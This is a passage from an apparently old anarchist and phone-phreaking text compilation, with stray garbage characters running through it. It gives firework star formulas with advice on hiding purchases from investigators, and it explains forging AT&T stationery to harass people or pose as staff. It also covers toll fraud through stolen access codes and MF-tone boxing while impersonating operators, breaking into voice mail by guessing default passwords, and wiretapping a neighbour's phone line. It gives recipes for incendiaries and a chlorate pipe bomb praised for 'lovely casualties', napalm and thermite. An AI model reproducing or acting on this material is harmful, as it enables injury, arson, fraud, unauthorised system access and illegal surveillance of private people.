  2263. Bind with water
  2264.  
  2265. Zinc Spreader Stars - Shoot out pieces of burning zinc and charcoal. These
  2266.   stars are much heavier than usual, and require larger charges if they're to
  2267.   be fired from a tube.
  2268.  
  2269. Zinc Dust             72
  2270. Potassium Chlorate    15
  2271. Potassium Dichromate  12
  2272. Granular Charcoal     12  ∩7Å3 èDextrine               2
  2273. bind with water
  2274.  
  2275. Electric Stars - Stars that contain aluminum powder
  2276.  
  2277. Potassium Nitrate     15        Potassium Chlorate    60
  2278. Aluminum, fine        2         Barium Nitrate        5
  2279. Aluminum, medium      1         Aluminum, fine        9
  2280. Black Powder          2         Aluminum, medium      4
  2281. Antimony Sulfide      3         Aluminum, coarse      3
  2282. Sulfur                4         Charcoal              2
  2283. bind with dextrine in           Dextrin               5
  2284. water                           bind with red gum in
  2285.                                 water
  2286. Potassium Perchlorate 6
  2287. Barium Nitrate        1         Potassium Perchlorate 4
  2288. Aluminum              20        Aluminum, medium      2
  2289. Dextrin               1         Dextrin               1
  2290. bind with shellac in            bind with shellac in alcohol
  2291. alcohol
  2292.  
  2293.  
  2294. Simpler Zinc Spreaders
  2295.  
  2296. Potassium Nitrate     14        Potassium Chlorate    5
  2297. Zinc Dust             40        Potassium Dichromate  4
  2298. Charcoal              7         Charcoal, medium      4
  2299. Sulfur                4         Zinc Dust             24
  2300. bind with dextrine in           bind with dextrine in water
  2301. water
  2302.  
  2303.  
  2304. Willow Tree Stars - Use large amounts of lampblack -- too much to burn fully.
  2305.   Gives a willow tree effect.
  2306.  
  2307. Potassium Chlorate    10
  2308. Potassium Nitrate     5
  2309. Sulfur                1
  2310. Lampblack             18
  2311. bind with dextrine in water
  2312.  
  2313. In future files, we'll look at using these mixtures to produce roman candles,
  2314. aerial bombs, and other effects. As always, don't forget that it's just plain
  2315. stupid to go buying all these materials from one chemical supply house. When
  2316. you buy it all as a group, they know what you plan to do with it, and they keep
  2317. records. If anyone goes investigating the source of homemade fireworks and
  2318. checks with your supplier, there will be a lead straight to you. Be sure to
  2319. cover your tracks.
  2320.  
  2321.  
  2322.  
  2323.                                  AT&T FORGERY
  2324.  
  2325. Here is a very simple way to either:
  2326.   ∩7Å3 è[1] Play an incredibly cruel and realistic joke on a phreaking end.
  2327.                                      -OR-
  2328. [2] Provide yourself with everything you ever wanted to be an AT&T person.
  2329.  
  2330.    All you need to do is get your hands on some AT&T paper and/or business
  2331. cards.  To do this you can either go down to your local business office and
  2332. swipe a few or call up somewhere like WATTS INFORMATION and ask them to send
  2333. you their information package. They will send you:
  2334. 1. A nice letter (with the AT&T logo letterhead) saying "Here is the info."
  2335. 2. A business card (again with AT&T) saying who the sales representative is.
  2336. 3. A very nice color booklet telling you all about WATTS lines.
  2337. 4. Various billing information. (Discard as it is very worthless)
  2338.  
  2339.    Now take the piece of AT&T paper and the AT&T business card down to your
  2340. local print/copy shop.  Tell them to run you off several copies of each, but
  2341. to leave out whatever else is printed on the business card/letter.  If they
  2342. refuse or ask why, take your precious business elsewhere.
  2343. (This should only cost you around $2.00 total)
  2344.  
  2345.    Now take the copies home and either with your typewriter, MAC, or Fontrix,
  2346. add whatever name, address, telephone number, etc. you like. (I would
  2347. recommend just changing the name on the card and using whatever information
  2348. was on there earlier)
  2349.  
  2350.    And there you have official AT&T letters and business cards.  As mentioned
  2351. earlier, you can use them in several ways.  Mail a nice letter to someone you
  2352. hate (on AT&T paper..hehehe) saying that AT&T is onto them or something like
  2353. that.  (Be sure to use correct English and spelling)  (Also do not hand write
  2354. the letter!  Use a typewriter! - Not Fontrix as AT&T doesn't use OLD ENGLISH
  2355. or ASCII BOLD when they type letters.  Any IBM typewriter will do perfectly)
  2356.  
  2357.    Another possible use (of many, I guess) is (if you are old enough to look
  2358. the part) to use the business card as some sort of fake id.
  2359.  
  2360.    The last example of uses for the fake AT&T letters & b.cards is mentioned
  2361. in my textfile, BASIC RADIO CALLING.  Briefly, send the station a letter that
  2362. reads:
  2363.     WCAT - FM202: (Like my examples? Haha!)
  2364. (As you probably know, radio stations give away things by accepting the 'x'
  2365. call. (ie: The tenth caller through wins a pair of Van Halen tickets)
  2366. Sometimes they may ask a trivia question, but that's your problem. Anyway, the
  2367. letter continues:)
  2368.   (You basically say that they have become so popular that they are getting
  2369. too many calls at once from listeners trying to win tickets. By asking them
  2370. to call all at the same time is overloading our systems.  We do, of course,
  2371. have means of handling these sort of matters, but it would require you sending
  2372. us a schedule of when you will be asking your listeners to call in.  That way
  2373. we would be able to set our systems to handle the amount of callers you get at
  2374. peak times..(etc..etc..more BS..But you get the idea, right?)
  2375.  
  2376.  
  2377.  
  2378.  
  2379.                               The Hacker's Handbook
  2380. [ Definitions ]  ∩7Å3 è
  2381. Phreak    ["free"k]  Verb--1. The act of "Phreaking"  2. The act of making
  2382.        telephone calls without paying money [Slang]
  2383.  
  2384. Phreaker  ["free"-k-er]  Noun--1. One who engages in the act of "Phreaking"
  2385.        2. One who makes telephone calls without paying money [Slang]
  2386.  
  2387. <%=-------------------------------------------------------------------------=%>
  2388.  
  2389. [ Introduction ]
  2390.  
  2391.      Phreaking is a method used by most intelligent people {most often those
  2392. who use a computer and a Modulator-Demodulator (MoDem)}.  If you happen to
  2393. resemble the major mass of people who do not have the income to afford large
  2394. phone bills then phreaking is for you.  If you live in an area with an
  2395. Electronic Switching System [ESS] then phreaking is something which should be
  2396. done in moderate amounts.
  2397.  
  2398. <%=-------------------------------------------------------------------------=%>
  2399.  
  2400. [ Switching Systems ]
  2401.  
  2402. Three types of switching systems are present in the United States today:
  2403.  
  2404.                [1] Step by Step
  2405.                [2] Crossbar
  2406.                [3] ESS  {Electronic Switching System}
  2407.  
  2408.  
  2409.                          <] Step by Step [>
  2410.  
  2411. First switching system used in America, adopted in 1918 and until 1978 Bell
  2412. had over 53% of all exchanges using Step by Step [SxS].  A long, and con-
  2413. fusing train of switches is used for SxS switching.
  2414.  
  2415.                          [> Disadvantages <]
  2416.    [A] The switch train may become jammed : Blocking call.
  2417.    [B] No DTMF [Dual-Tone Multi-Frequency]["Touch-tone"].
  2418.    [C] Much maintenance and much electricity.
  2419.    [D] Everything is hard wired
  2420.  
  2421.                         +> Identification <+
  2422.    [A] No pulsing digits after dialing or DTMF.
  2423.    [B] Phone Company sounds like many typewriters.
  2424.    [C] No:  Speed calling, Call forwarding, and other services.
  2425.    [D] Pay-phone wants money first before dial-tone.
  2426.  
  2427.  
  2428.                            <] Crossbar [>
  2429.  
  2430. Crossbar has been Bell's primary switcher after 1960.  Three types of Crossbar
  2431. switching exist:  Number 1 Crossbar [1XB], Number 4 Crossbar [4XB], and Number
  2432. 5 Crossbar [5XB].  A switching matrix is used for all the phones in an area.
  2433. When someone calls, the route is determined and is met up with the other phone.
  2434. The matrix is set-up in horizontal and vertical paths.  There are no definite  ∩7Å3 èdistinguishing features of Crossbar switching.
  2435.  
  2436.  
  2437.                               <] ESS [>
  2438.  
  2439. You probably were hoping I wouldn't talk about this nightmare, if you did you
  2440. will know why everyone doesn't want to be reminded about Bell's holocaust on
  2441. America.  With ESS Bell knows:  every digit dialed {including mistakes!}, who
  2442. you call, when you called, how long you were connected, and in some cases,
  2443. what you talked about!  Yes, this is the closest anyone has come to true
  2444. Totalitarianism.  ESS is programed to print out the numbers of people who make
  2445. excessive calls to WATS numbers [Wide Area Telephone Service][1-800 numbers]
  2446. or directory assistance.  This deadly trap is called "800 Exceptional Calling
  2447. Report."  ESS can be programed to print logs of who called certain numbers.
  2448. Electronic Switching System makes the job of the FBI, Bell Security {The
  2449. Gestapo in phreakin' tongue}, NSA, and other organizations which like to invade
  2450. our privacy, extremely easy!  Tracing is done in microseconds, and the results
  2451. are printed out on the monitor of a Gestapo officer.  ESS can also pick up
  2452. foreign tones on the line, like 2600 Hz. {used in blue boxes, discussed later}.
  2453. Bell claims that the entire country will be plagued by ESS by the 1990's!
  2454.  
  2455.                            +> Identification <+
  2456.    [A] Dialing 911 for emergencies.
  2457.    [B] Dial-tone first for pay-phones.
  2458.    [C] Calling services, like:  Call forwarding, Speed dialing, Call waiting.
  2459.    [D] ANI [Automatic Number Identification] for long-distance calls.
  2460.  
  2461.  
  2462. [[[Note]]]  of the above identifications of the three switching systems, do
  2463.             not solely rely on these descriptions, the best way to find out
  2464.             is to [no!] call your local telephone company.
  2465.  
  2466. <%=-------------------------------------------------------------------------=%>
  2467.  
  2468. [ Long-Distance Services ]
  2469.  
  2470. To attempt to help the community {and for private business} companies developed
  2471. ways to lessen the costs of long-distance calling charges.  The companies own
  2472. their own switching systems and use extenders for callers to call.  The way
  2473. extenders operate:  1] Customer calls service, 2] He/she hears a low tone which
  2474. sounds like a dial-tone, 3] She/he either dials the access code then the phone
  2475. number, or dials the phone number then the access code, 4] Is connected to
  2476. whatever he/she calls.  Aside from Ma Bells collection, the customer receives a
  2477. bill for calls made with his/her long-distance company {a supposedly cheaper
  2478. bill than Ma Bell's}.  Thought:  Hey, I could randomly pick access codes and
  2479. use them to call whatever area the company services!  Right, that's what basic
  2480. phreaking is!  A wise idea, though, is to have many access codes and many
  2481. service numbers to rotate throughout your average life as a phreaker.  To aid
  2482. in your quest to beat the system I have provided many 1-800 numbers which
  2483. anyone can call, aside from local numbers, such as Sprint, or MCI.  The reason
  2484. for providing you with WATS numbers is because all of us aren't in a big city
  2485. where Sprint or MCI even exist, this way everyone can phreak!  A way to find
  2486. more access codes is by using your old modem.  Yes, your modem can imitate DTMF
  2487. tones!
  2488.   ∩7Å3 è  {>Procedure:  1)  dial 1-800  +  service number
  2489.                 2)  dial access code->area code->phone number, or
  2490.                 3)  dial area code->phone number->access code
  2491.  
  2492. [ Colored Boxes ]
  2493.  
  2494. A more shrewd, technological, safer {without ESS} way to phreak is with a piece
  2495. of hardware known as a ________ Box.  Boxes are many different colors {I don't
  2496. know ALL the colors because it seems like every time I turn around there's some
  2497. new color out!}.  Colors I have heard of:  Blue, Black, Red, White, Silver,
  2498. Clear, and MANY, MANY more...  Plans for making these boxes can be obtained by
  2499. calling different boards [BBS's], AE lines, or whatever.  But!, if you have an
  2500. Apple Cat modem then do I have good news for ->you<-!!  The Apple Cat modem
  2501. can emulate the frequencies {usually 2600 Hz.} made by ________ Boxes with the
  2502. help of a handy little program called "Cat's Meow!"
  2503.  
  2504. <%=-------------------------------------------------------------------------=%>
  2505.  
  2506.  
  2507.                           Hacking Voice Mail Systems
  2508.  
  2509. Voice Mail is a relatively new concept and not much has been said about it.
  2510. It is a very useful tool for the business person and the phreak.  The way it
  2511. works is that somebody wishing to get in touch with you calls a number,
  2512. usually a 1-800, and punches in on his touch-pad your mailbox number and then
  2513. he is able to leave a message for you.  Business experts report that this
  2514. almost totally eliminates telephone tag.  When a person wishes to pick up his
  2515. message all he needs to do is call the number enter a certain code and he can
  2516. hear his messages, transfer them, and do other misc. mailbox utilities.
  2517.  
  2518. Most VMSs are similar in the way they work.  There are a few different ways
  2519. the VMSs store the voice.  One way is that the voice is recorded digitally and
  2520. compressed and when heard it is reproduced back into the voice that recorded
  2521. it. Another method that is slower and uses more space, but costs less, stores
  2522. the voice on magnetic tape, the same type that is used to store data on a
  2523. computer, and then runs the tape at a slow speed.  Using this method the voice
  2524. does not need to be reproduced in any way and will sound normal as long as the
  2525. tape is running at a constant speed.  On some of the newer VMSs the voice is
  2526. digitally recorded and is transformed from the magnetic tape at about 2400
  2527. bits per second.
  2528.  
  2529. There are many different types and versions of voice mail systems.  Some of
  2530. the best and easiest to get on will be discussed.
  2531.  
  2532. Centagram
  2533. ---------
  2534. These are direct dial (you don't have to enter a box number).  To get on one
  2535. of these, first have a number to any box on the system.  All of the other
  2536. boxes will be on the same prefix; just start scanning them until you find one
  2537. that has a message saying that person you are calling is not available.  This
  2538. usually means that the box has not been assigned to anybody yet.  Before the
  2539. nice lady's voice tells you to leave the message, hit #.  You will then be
  2540. prompted for your password.  The password will usually be the same as the last
  2541. four digits of the box's number or a simple number like 1000, 2000, etc.  Once
  2542. you get on, they are very user friendly and will prompt you with a menu of  ∩7Å3 èoptions.  If you can't find any empty boxes or want to do more, you can hack
  2543. but the system administrators box, which will usually be 9999 on the same
  2544. prefix as the other boxes, will allow you to hear anybody's messages and
  2545. create and delete boxes.
  2546.  
  2547. Sperry Link
  2548. -----------
  2549. These systems are very nice.  They will usually be found on an 800 number.
  2550. These are one of the hardest to get a box on because you must hack out a user
  2551. ID (different from the person's box number) and a password.  When it answers,
  2552. if it says, "This is a Sperry Link voice station.  Please enter your user ID,"
  2553. you will have to start trying to find a valid user ID.  On most Sperrys it
  2554. will be a five digit number.  If it answers and says, "This is an X answering
  2555. service," you first have to hit *# to get the user number prompt.  Once you
  2556. get a valid user number will have to guess the password on most systems, it
  2557. will be 4 digits.  Once you get in, these are also very user friendly and have
  2558. many different options available.
  2559.  
  2560. RSVP
  2561. ----
  2562. This is probably one of the worst VMSs but it is by far the easiest to get
  2563. yourself a box.  When it answers you can hit * for a directory of the boxes on
  2564. it (it will only hold 23).  If you hit # you will be given a menu of options
  2565. and when you choose an option you will then be prompted for your ID number.
  2566. The ID number on an RSVP system will just about always be the same as the
  2567. mailbox number, which are always only 2 digits.
  2568.  
  2569. A.S.P.E.N.
  2570. ----------
  2571. The Aspen voice message systems made by Octel Telecommunications is in my
  2572. opinion the BEST VMS made.  To get a box on an Aspen, you need to find an
  2573. empty box.  To find an empty box, scan the box numbers and if one says, "You
  2574. entered XXXX.  Please leave a message at the tone," then this is an empty box.
  2575. You next just press # and when prompted for your box number enter the number
  2576. of the empty box and friendly voice of the nice lady will guide you through
  2577. all of the steps of setting up your box.  She first tells you what you can do
  2578. with the box and then will prompt you with, "Please enter the temporary
  2579. password assigned to you by your system manager."  This password will usually
  2580. be 4 digits long and the same as the box number like 1000, etc.  Once you get
  2581. on their are many things you can do.  You can make a distribution list where
  2582. if you want to leave a certain message to more than one person, you can enter
  2583. the list number and all of the boxes on the list will get the message. You can
  2584. also have the system call you and notify you that you have new messages. These
  2585. systems also have what they call "Information center mailboxes" that are
  2586. listen only and can also have a password on them so the person calling has to
  2587. enter the password before he hears the greeting message.  Aspen VMSs have a
  2588. system managers mailbox that will just about give you total control of the
  2589. whole system and let you listen to people's mail, create and delete boxes, and
  2590. many other things.
  2591.  
  2592.  
  2593.  
  2594.                             IMPROVISED INCENDIARIES
  2595.  
  2596. 1) Chlorate-Sugar mix  ∩7Å3 è
  2597.    This mixture can be either an incendiary or an explosive.  Sugar is the
  2598. common granulated household type.  Either potassium chlorate (KClO3) or sodium
  2599. chlorate (NaClO3) can be used; but potassium is potassium is preferred.
  2600. Proportions can be by equal parts or by volume, or 3 parts chlorate to 2 parts
  2601. sugar preferred.  Mix in or on a non-sparking surface.  Unconfined, the mixture
  2602. is an incendiary.  Confined in a tightly capped length of pipe, it will explode
  2603. when a spark is introduced.  Such a pipe will produce lovely casualties, but is
  2604. not very good for breaching of cutting up.  Concentrated sulfuric acid will
  2605. ignite this very fast burning incendiary mixture.  Placing the acid in a
  2606. gelatin capsule, balloon, or other suitable container will provide a delay,
  2607. (length of which depends on how long it takes for the acid to eat through the
  2608. container).
  2609.  
  2610. 2) Potassium Permanganate And Sugar
  2611.  
  2612.    Another fast burning, first fire mix is obtained by mixing potassium
  2613. permanganate, 9 parts, to one part sugar.  It is some what hotter than the
  2614. chlorate sugar mix, and can be ignited by the addition of a few drops of
  2615. glycerine.
  2616.  
  2617. 3) Improvised Napalm
  2618.  
  2619.    In talking about this, I have found that there are many ways to this
  2620. wonderful substance.  My favorite is by mixing gasoline and styrofoam.  Usually
  2621. in a metal can. Keep adding the styrofoam until the mix is very stinky, an then
  2622. add a little bit of kerosine. Another method is by taking a double boiler,
  2623. filling the bottom portion with approx 3/4 full of water. Put either gasoline
  2624. or kerosine into the top.  Add pure SOAP chips to the mix.  Heat the fuel until
  2625. it boils and then simmers. Stir constantly until the desired consistency is
  2626. reached: remember that it will thicken further on cooling. Last we come the
  2627. 'Soldier' technique, anyone who saw this movie will recognize this one.
  2628. Carefully heat the end of a 100 watt light bulb. again-carfully remove the
  2629. metal end and internal parts.  Fill the glass bulb with half gasoline. and then
  2630. 1/4 more with dish washing liquid.  Finally take rubber cement and glue the two
  2631. parts back together.  Be sure that you put enough mixture into the build so
  2632. that the metal wire is well submerged before use and during.
  2633.  
  2634. 4) Molded Bricks That Burn
  2635.  
  2636.    Proportions are 3 parts aluminum powder, 4 parts water and 5 parts plaster
  2637. of paris.  Mix the aluminum and plaster thoroughly together, then add the water
  2638. and stir vigorously. Pour the resulting mix into a mold, let harden, and then
  2639. dry for 2 to 3 weeks. These blocks are hard to ignite, and take a long time to
  2640. make, but when ignited on mild steal, they have a tendency to melt it.
  2641.  
  2642. 5) The Fire Bottle
  2643.  
  2644.   Fill a good Jack Daniel's bottle about one-fifth to one-fourth full with
  2645. sulfuric acid.  Fill the remainder with gasoline, kerosine, or a good
  2646. combination of the two and mix thoroughly.  Add water to Potassium Chlorate and
  2647. sugar mix, and soak rags in the mix.  Wrap the rags around the bottle, tie in
  2648. place, and allow to dry.  When thrown at a T-62 or other target, the bottle
  2649. will break, the acid will ignite the chlorate-sugar mix on the rags, which will
  2650. ignite the fuel.  ∩7Å3 è
  2651. 6) Molotov Cocktails
  2652.  
  2653.   These do not 'explode' per say, they just spread around the fuel and, if your
  2654. lucky the oil/gas mix combusts enough to give you a little "boom".  A two to
  2655. one ratio of gas to oil works nicely.  Napalm can also be used, or jelly gas is
  2656. fine.
  2657.  
  2658. 7) Thermite
  2659.  
  2660.   Use any size can with sticks tied or taped to sides and cut a small hole in
  2661. the bottom. Cover bottom with paper.  Place round stick wrapped in paper in
  2662. middle of can.  Fill bottom of can 1/4 inch with magnesium. Over this place
  2663. mixture of 3 parts ferric oxide and 2 parts aluminum powder. Remove stick
  2664. (leaving paper tunnel) and fill hole with mixture 3 parts potassium chlorate
  2665. and 1 part sugar.  Top the hole with a paper bag containing chlorate-sugar mix
  2666. with fuse protruding Tamp top with dirt or clay.
  2667.  
  2668.  
  2669.             THE JOY OF "BOXING"
  2670.                BY THE DRAGYN
  2671.  
  2672.   I AM WRITTING THIS ARTICLE TO INFORM THOSE OF YOU THAT HAVE A BOX
  2673. AND ARE GETTING BORED WITH NOTHING TO DO OR IF YOU JUST AREN'T QUITE
  2674. SURE WHAT YOU ARE DOING WHEN YOU PLAY AROUND WITH MF TONES.  FIRST OF
  2675. ALL, WHEN YOU BLAST OUT THE 2600HZ TONE, YOU ARE DROP PING A TRUNK AND
  2676. ESSENTIALLY, YOU BECOME YOUR OWN OPERATOR.  WHEN YOU PLACE A LONG
  2677. DISTANCE PHONE CALL, A COMPUTER USUALLY DOES THE MF TONES FOR YOU AND
  2678. YOU DON'T HEAR THEM.  IN THIS ARTICLE, I WILL DEAL WITH INTERNATIONAL
  2679. CALLING, CONFERENCING, EMERGENCY-BREAK THROUGHS AND JUST HAVING FUN
  2680. WITH THE BOX.  BUT NOWDAYS, BOXING IS MUCH MORE RISKIER THAN IT WAS
  2681. BACK 10-15 YEARS AGO, SO IF YOU AREN'T CAUTIOUS OR YOU LIVE ON A
  2682. MODERN ESS, THAN YOU MIGHT JUST GET CAUGHT (BUT IF YOU'RE NOT 18 YET
  2683. THEN BIG DEAL!    GO RAG THE HELL OUT OF MA BELL!)
  2684.  
  2685.   HAVE YOU EVER WANTED TO CALL OVERSEAS AND TALK TO SOMEONE IN ANOTHER
  2686. COUNTRY?  OR ARE YOU JUST BORED OF METROFONE OR MCI?  THEN TRY THIS:
  2687. WHEN YOU PLACE AN INTERNATIONAL CALL, IT IS ROUTED THROUGH THE CLOSEST
  2688. OR CLOSEST UNBUSY INTERNATIONAL LINK.  YOU CAN FIND THESE LINKS BY
  2689. GOING KP-213-182-ST.  THIS IS THE LOS ANGLES LINK.  MOST MAJOR CITIES
  2690. HAVE THEM BY THE COAST LIKE NEW YORK KP-212-182-ST AND EVEN DENVER
  2691. KP-303-182-ST.    WHEN YOU CALL ONE OF THESE LINKS, YOU WILL GET A TONE,
  2692. SOMETIMES NOT, AND THEN YOU HAVE ABOUT 10 SECONDS TO ENTER THE NUMBER
  2693. YOU ARE DIALING IN MF TONES.  IF YOU MAKE A MISTAKE, IT WILL TELL YOU.
  2694. THE NORMAL FORMAT FOR MAKING A CALL WOULD BE:  KP-212-182-ST (WAIT FOR
  2695. TONE) KP-( COUNTRY CODE)-(PHONE NUMBER IN COUNTRY) -ST THEN WAIT FOR
  2696. THE CALL TO GO THROUGH.
  2697.  
  2698.   THERE TWO WAYS TO DO CONFERENCE CALLS.  ONE IS TO MF UP
  2699. KP-213-080-1050- ST.  THIS GIVES YOU ALIANCE TELE-CONFERENCING IN LOS
  2700. ANGLES.  THE WAY THIS ONE WORKS IS YOU ENTER KP-2130801050-ST WAIT
  2701. TILL YOU HEAR IT DROP TWICE THEN YOU ENTER ANOTHER NUMBER THAT THE
  2702. CALL IS GOING TO BE BILLED TO (USUALLY SOME- ONE THAT YOU DON'T LIKE).
  2703. THIS ONE IS TOTALLY COMPUTER CONTROLLED AND YOU JUST ENTER THE INFO
  2704. NEEDED BY A NORMAL TOUCH TONE PAD.  THE OTHER WAY FOR CONFERENCING IS  ∩7Å3èTO MF UP YOUR LOCAL OR NOT SO LOCAL CONFERENCE OPERATOR.  TO DO THIS
  2705. JUST DROP A TRUNK THEN GO KP-(AREA CODE)-11511-ST AND THE LADY WILL
  2706. ANSWER "CONFERENCE OPERATOR, CAN I HELP YOU?" NOW IF YOU WANTED TO
  2707. HOOK JUST 1-10 PEOPLE TOGETHER YOU GIVE HER THE PH#S AND SHE WILL DIAL
  2708. THEM UP AND PUT EVERYONE ON TOGETHER, MEANWHILE, SHE THINKS YOU ARE
  2709. THE OPERATOR SETTING IT UP FOR SOMEONE ELSE.  ONE NOTE, WHENEVER YOU
  2710. ARE DIALING IN MF TONES AND GET AN OPERATOR, THEY HAVE NO IDEA THAT
  2711. YOU ARE BOXING, THEY JUST THINK YOU ARE AN OPERATOR FROM SOMEWHERE OUT
  2712. OF TOWN.  SO DON'T BE SCARED, GIVE THOSE OPERATORS HELL!  IN FACT, IF
  2713. YOU CAN FIND A GOOD OPERATOR, THEY WILL EVEN TELL YOU HOW TO DO
  2714. THINGS.
  2715.  
  2716.   NOW DON'T YOU ALL HATE A BUSY SIGNAL?  EVER TRY TO GET TO SOMEONE
  2717. AND THE LINE WAS BUSY?    WELL, DON'T FRET ANYMORE!  LET'S SAY THAT THE
  2718. PHONE NUMBER 612-874-8700 WAS BUSY AND YOU WANTED TO GET THROUGH.
  2719. FIRST YOU WOULD DROP YOUR TRUNK THEN GO KP-612-121-ST.    THIS WILL GIVE
  2720. YOU A LOCAL OPERATOR IN THE 612 AREA CODE.  WHEN SHE ANSWERS (SHE
  2721. THINKS YOU ARE AN OPERATOR FROM SOME-WHERE ELSE CALLING) YOU SAY
  2722. "EMERGENCY INTERRUPTION ON AREA CODE 612-874-8700 AND THE PARTIES NAME
  2723. IS PETER (OR SOME DUMP NAME)." SINCE TRUNK VERIFICATION CANNOT BE DONE
  2724. BY OUTSIDE TOLL SWITCHING SYSTEMS, YOU CANNOT DO THESE BY BOXING AND
  2725. YOU HAVE TO LET THE OPERATOR DO THEM FOR YOU.  AGAIN, SHE HAS NO WAY
  2726. OF KNOWING THAT YOU AREN'T AN OPERATOR WHEN YOU CALL HER UNLESS YOU
  2727. ARE 12 YEARS OLD AND SOUND LIKE A SNIVELING LITTLE WIMP.  AFTER THE
  2728. OPERATOR HAS CLEARED THE LINE, YOU CAN DIAL IT AND I T WON'T BE BUSY.
  2729. IF IT IS OUT OF ORDER SHE MAY SAY IT IS ODD OR OFF THE HOOK.
  2730.  
  2731.   NOW LET'S SAY YOU JUST WANT TO MAKE AN ORDINARILY PHONE CALL OR CALL
  2732. AN 800 PH#.  AFTER YOU DROP YOUR TRUNK, JUST DO THIS KP-(AREA
  2733. CODE)-(PH#)-ST, AND NOTICE THAT NO '1' IS NEEDED.
  2734.  
  2735.   NOW, WHAT IF YOU HAVE A FRIEND WITH A PHONE IN HIS CAR?  WELL, YOU
  2736. JUST MF UP THE MOBILE OPERATOR BY GOING KP-(AREA CODE)-11521-ST.
  2737.  
  2738.   AGAIN, REMEMBER THAT WHENEVER YOU TALK TO ONE OF THE OPERATORS, THEY
  2739. HAVE NO WAY OF KNOWING WHETHER YOU ARE A REAL OPERATOR OR NOT SO GIVE
  2740. THEM HELL AND DON'T BE SCARED!  I GUESS THAT THIS IS ALL FOR NOW, BUT
  2741. IF YOU WOULD LIKE MORE INFORMATION, LEAVE E-MAIL BUT NO RUGGIES
  2742. PLEASE.
  2743.  
  2744.  
  2745.  
  2746.                              * PRIVATE AUDIENCE *
  2747.  
  2748.                   (A BASIC LESSON IN THE ART OF LISTENING IN)
  2749.  
  2750. Federal law:
  2751.   Section 605 of title 47 of the U.S code, forbids interception of
  2752. communication, or divulagance of intercepted communication except by persons
  2753. outlined in section 119 of title 18 (a portion of the Omnibus crime control and
  2754. safe streets act of 1968). This act states that "It shall not be unlawful under
  2755. this act for an operator of a switchboard, or an officer, employee, or agent of
  2756. any communication common carrier who's switching system is used in the  ∩7Å3ètransmission of a wire communication to intercept or disclose intercepted
  2757. communication."
  2758.  
  2759.                                PART II: TAPPING
  2760.  
  2761. Everyone has at some time wanted to hear what a friend, the principal, the prom
  2762. queen, or a neighbor has to say on the phone. There are several easy ways to
  2763. tap into a phone line. None of the methods that I present will involve actually
  2764. entering the house. You can do everything from the backyard. I will discuss
  2765. four methods of tapping a line. They go in order of increasing difficulty.
  2766.  
  2767. 1. The "beige box": a beige box (or bud box) is actually better known as a
  2768. "lineman" phone. They are terribly simple to construct, and are basically the
  2769. easiest method to use. They consist of nothing more than a phone with the
  2770. modular plug that goes into the wall cut off, and two alligator clips attached
  2771. to the red and green wires. The way to use this box, is to venture into the
  2772. yard of the person you want to tap, and put it onto his line. This is best done
  2773. at the bell phone box that is usually next to the gas meter. It should only
  2774. have one screw holding it shut, and is very easily opened. Once you are in, you
  2775. should see 4 screws with wires attached to them. If the house has one line,
  2776. then clip the red lead to the first screw, and the green to the second. You are
  2777. then on the "tappee's" phone. You will hear any conversation going on. I
  2778. strongly recommend that you remove the speaker from the phone that you're using
  2779. so the "tappee" can't hear every sound you make. If the house has two lines,
  2780. then the second line is on screws three and four. If you connect everything
  2781. right, but you don't get on the line, then you probably have the wires
  2782. backward. Switch the red to the second screw and the green to the first. If no
  2783. conversation is going on, you may realize that you can't tap the phone very
  2784. well because you don't want to sit there all night, and if you are on the
  2785. phone, then the poor tappee can't dial out, and that could be bad...so.......
  2786. method two.
  2787.  
  2788. 2. The recorder: This method is probably the most widespread, and you still
  2789. don't have to be a genius to do it. There are LOTS of ways to tape
  2790. conversations. The two easiest are either to put a "telephone induction pickup"
  2791. (Radio Shack $1.99) on the beige box you were using, then plugging it into the
  2792. microphone jack of a small tape recorder, and leaving it on record. Or plugging
  2793. the recorder right into the line. This can be done by taking a walkman plug,
  2794. and cutting off the earphones, then pick one of the two earphone wires, and
  2795. strip it. There should be another wire inside the one you just stripped. Strip
  2796. that one too, and attach alligators to them. Then follow the beige box
  2797. instructions to tape the conversation. In order to save tape, you may want to
  2798. use a voice activated recorder (Radio Shack $59), or if your recorder has a
  2799. "remote" jack, you can get a "telephone recorder control" at Radio shack shack
  2800. for $19 that turns the recorder on when the phone is on, and off when the phone
  2801. is off. This little box plugs right into the wall (modularly of course), so it
  2802. is best NOT to remove the modular plug for it. Work around it if you can. If
  2803. not, then just do you best to get a good connection. When recording, it is good
  2804. to keep your recorder hidden from sight (in the Bell box if possible), but in a
  2805. place easy enough to change tapes from.
  2806.  
  2807. 3. The wireless microphone: this is the BUG. It transmits a signal from the
  2808. phone to the radio (FM band). You may remember Mr. Microphone (from Kaytel
  2809. fame); these wireless microphones are available from Radio Shack for $19. They
  2810. are easy to build and easy to hook up. There are so many different models, that  ∩7Å3 èis is almost impossible to tell you exactly what to do. The most common thing
  2811. to do is to cut off the microphone element, and attach these two wires to
  2812. screws one and two. The line MIGHT, depending on the brand, be "permanently off
  2813. hook". This is bad, but by phucking around with it for a while, you should get
  2814. it working. There are two drawbacks to using this method. One, is that the poor
  2815. asshole who is getting his phone tapped might hear himself on "FM 88, the
  2816. principal connection". The second problem is the range. The store bought
  2817. transmitters have a VERY short range. I suggest that you build the customized
  2818. version I will present in part four (it's cheaper too). Now on to the best of
  2819. all the methods....
  2820.  
  2821. 4. The "easy-talks": This method combines all the best aspects of all the the
  2822. other methods. It only has one drawback... You need a set of "Easy-talk" walkie
  2823. talkies. They are voice activated, and cost about $59. You can find 'em at toy
  2824. stores, and "hi-tech" catalogs. I think t(at any voice activated walkie talkies
  2825. will work, but I have only tried the easy-talks. First, you have to decide on
  2826. one for the "transmitter" and one for the "receiver". It is best to use the one
  2827. with the strongest transmission to transmit, even though it may receive better
  2828. also. De-solder the speaker of the "transmitter", and the microphone of the
  2829. "receiver". Now, go to the box. put the walkie talkie on "VOX" and hook the
  2830. microphone leads (as in method three) to the first and second screws in the
  2831. box. Now go home, and listen on your walkie talkie. If nothing happens, then
  2832. the phone signal wasn't strong enough to "activate" the transmission. If this
  2833. happens, there are two things you can do. One, add some ground lines to the
  2834. microphone plugs. This is the most inconspicuous, but if it doesn't work then
  2835. you need an amplifier, like a walkman with two earphone plugs. Put the first
  2836. plug on the line, and then into one of the jacks. Then turn the volume all the
  2837. way up (w/out pressing play). Next connect the second earphone plug to the mice
  2838. wires, and into the second earphone outlet on the walkman. Now put the whole
  2839. mess in the box, and lock it up. This should do the trick. It gives you a
  2840. private radio station to listen to them on: you can turn it off when something
  2841. boring comes on, and you can tape off the walkie talkie speaker that you have!
  2842.  
